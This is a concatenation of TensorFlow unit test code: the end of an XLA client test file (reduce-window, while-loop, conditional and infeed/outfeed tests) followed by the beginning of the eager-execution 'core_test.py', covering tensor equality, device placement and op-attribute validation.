self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
@test_util.disable_tfrt('Device name incorrect (known issue for runtime '
'fallback).')
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
@test_util.disable_tfrt('Device name incorrect (known issue for runtime '
'fallback).')
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
@test_util.disable_tfrt('TensorHandleInterface::Resolve() not implemented.')
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('Async execution mode not supported in TFRT.')
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
@test_util.disable_tfrt('Resolve not implemented yet.')
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
